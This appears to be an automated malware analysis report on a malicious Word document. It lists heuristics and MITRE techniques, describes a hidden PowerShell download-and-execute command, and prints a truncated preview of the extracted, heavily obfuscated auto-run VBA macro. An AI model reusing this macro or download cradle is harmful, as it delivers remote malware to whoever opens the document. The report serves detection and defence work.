Verdict: MALICIOUS
Risk Score: 162
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains VBA macros, specifically a Document_Open macro that uses the Shell() function. This macro constructs and executes a PowerShell command: powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('the embedded link')". This command is designed to download and execute a script from the specified URL, indicating downloader or dropper functionality. The presence of VBA macros and the execution of an external script strongly suggest a malicious document, likely delivered via spearphishing.
Heuristics (5)
- VBA macros detected (medium; 3 related findings; OLE_VBA_MACROS): Document contains VBA macro code.
- Shell() call in VBA (critical; OLE_VBA_SHELL): Shell() call in VBA.
- Document_Open macro (high; OLE_VBA_DOCOPEN): Document_Open macro.
- VBA p-code auto-exec with execution tokens (high; OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info; EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body).
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 8659ebbebebe13029c6c914a14c80b9f3ead77a2605efd83595b2e0498f5923e) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 43715 bytes |
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ipisiiaFQG"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
KKdXp = (41704 - JCnXsT) + 81342 + 84908 * 55489 * ljTLC
IJNmM = (46435 - vpnYT) + 3973 + 16170 * 79486 * tndfXs
rkGhWmPMdcp = Application.Run("oUzNlVT", "" + czkOMAwYRhCz + CnoKjoHzdKAAPD + UjsiSUa + dDwPDwz + XEAsFJ + hVmzubRbI + LqXvbEiJ + ZSUasujYO + rVwzPOla + LsdqMiTAJ + IFEXiYaJ + HqQSCwBIc + ujlIoFiXLaw + vuKDs + zYIzSmN + kQwipmMRJDW + cnQMtowhkR + fOFfP + dTZNMkuHDZs + lihtUwPnzV)
Gbalq = (31148 - mKjEhh) + 56412 + 4542 * 57586 * wiwsV
End Sub
Attribute VB_Name = "wiXULpfwEqFJUW"
Function UjsiSUa()
On Error Resume Next
tlzkkO = 96261 + jjFPH / (94809 / UwDSV / TdKRK + qwfzlD + (65179 + hUdLz - (26211 + RZIpZ * JzICrw + aHmSZn)))
VpTDOG = (zmJWWG * aTYQpA * oFolJz / hnQlYW + (84975 - VQkGv - 42430 + HSRNvO / XzINF - kfREGJ))
OqJwLUuwUq = "" + jTLZjnA + SIACDCblnjBXw + "PoWe" + zoZhKmMF + ppdzEVzpK + "rSh"
UjsiSUa = "" + iXEkrnzaIdmYE + OSIGGCulOMwmjL + OqJwLUuwUq
BPPFvA = kKisV + HtXzzK * 92372 / NaDYA
mWUQQV = TwNfwn + QZYJH * 59887 / DSlnmq
End Function
Function dDwPDwz()
On Error Resume Next
LjvRwB = BMvOKv + FFIik * 99383 / oOImfU
cdfZaz = PrsCOp + iOJrw * 47778 / qpfbT
AzHJHD = wlPnj + COclcG * 69610 / WtjntX
cEvdAGZzJp = "" + ThuNMwHBoEu + SwTSmAfBCN + "eL" + dDYVOjt + wGlPpQV + "L " + CpazbmUbkRHdQ + IiujfZXBzRWph + Chr(34) + "[S" + kKQNLNdiclBmwb + fmtGGVlFOin + "tRI" + FwnYnhzNDIff + zinbawpqC + "NG" + qOYLwjZCvXoNOI + OciObCD + "]::"
bDNctO = zczTZB + bGcJu * 18433 / ZShua
GXzJOjEmc = "" + UnKkkWdLaC + NlLaiNWCIwtJiK + "joIN" + jhSzVaIJIpQi + CGlPCnGGQMrVRV + "(''," + FaUsfsj + ncCRpwoENv + "((" + PHOdZRFIAI + HjqOGPKWc + " 3" + LEobQDQDa + qSFOFbiAYfp + "6 , " + FGawwlPv + DZkppFjEMGisY + "83 " + JjsbRjVQiVJcS + shRZCoUlovpad + ", 1" + MiRGpCXTHJh + UfcQzXOz + "10,1" + GCozDjcJriwIaL + nUNJPUfNR + "17, " + YaGTiljKE + UniApbI + "61" + QFjjujR + XajuNDilPPWr + " ,1"
REMtpN = zTBuI + THTVbq * 20857 / rOqPCq
PiAai = iDFED + TrWZz * 38417 / YjZYZ
hDQbFoBuaN = "" + KaADwarLPqmWX + qhjQMDwiPqZ + "10"
rlNYk = hdTAz + iLiwLi * 69330 / kirbGw
imWmW = qTIiVh + KMAXOT * 86730 / YVJMO
ToWUhijDM = "" + MaHqccWVw + cihXOZOz + ", " + wditdIulSn + MGZrECjLdOl + "10"
BBTNh = LOuOzd + wTcjiK * 95352 / WazWUL
oFqnBzDppSD = "" + jsBbcHaYlEzOR + OGDQiujafRi + "1 " + qMWviBiFbV + BKtFzlEi + ",119"
dDwPDwz = "" + OIAzwARW + jFiZiBfQNXnljE + cEvdAGZzJp + qVffZtAizOvl + nELYfwcUXzG + GXzJOjEmc + zVdbwQPJvr + nEAbTGtNjj + hDQbFoBuaN + IYjGWzhZlY + UmzVnUsN + ToWUhijDM + srctDrM + OmDTXjInwJEm + oFqnBzDppSD
nGhGY = 50960 / rUtGf - (84756 - ctqNLo)
RTcoi = 63624 / DbOipp - (74523 - knzVW)
End Function
Function XEAsFJ()
On Error Resume Next
roiKE = 37798 / bZNNoO - (58424 - vhwRRr)
vvhRvWWk = "" + qXFaLSSHHGkAz + kknEcbzIGEEoY + ", 45" + UqmpUhORPHvFh + ivLJjjEwZNsOwW + " , " + tGOluOKBHVT + hWQBMVIcPUMQtM + "11" + TPvIdBwSVzU + BLNjzsrb + "1 " + AzBimCVAChZo + PTjXzfMAWT + ", "
wktTl = 935 / iuJcW - (23808 - AwREk)
dQiLGZOBLr = "" + QjMTihZzchRdD + jwYibiGq + "98, " + jfOjSizD + MGRVXFujuF + "10" + PriHMfiK + DIzCKQKzRatRu + "6 " + CKWkZwEcUQW + WUZAJWDJ + ",101" + udWuoITwwG + VHZltzjd + ",9"
PAdwBt = 14905 / YVipc - (13480 - BPUBS)
jMzRaY = 56775 / cuiFN - (42054 - rGZqY)
zcdrwC = "" + jiShrjMcUNV + zkTjuTskG + "9 , "
hkYNbb = 3305 / YiTmH - (81622 - VPROrs)
MKuGkDhSFzI = "" + WGGiOPuZIZAHLw + MIviizLtIwcSs + "116 " + fjirVUX + otiiqdKQ + ",32" + fjHRPZuNVQ + hdXVXjHfXoK + ",78" + lSdCinMCWzSYSP + HCiWMLBKUGd + " , "
zqYUXd = 11914 / KqcaZ - (20971 - FzFRqF)
ShzjiQnkuJ = "" + PhZRTiYKDRZ + DvlLKwLFwnAXFX + "101," + SfjEvEpD + cRSXHlVLtKfivU + "116" + TuZuNKYzkl + wwFhXMT + " , 4" + YfOCudpjokMdY + iujStUmWtRMvEz + "6, " + AhjvOKrTjiRv + aZNKDccBATl + "87,1" + khikihCLwp + UCQlLDrVNqmi + "01 ,"
iGwhPJ = (oHlwz
```
... (truncated)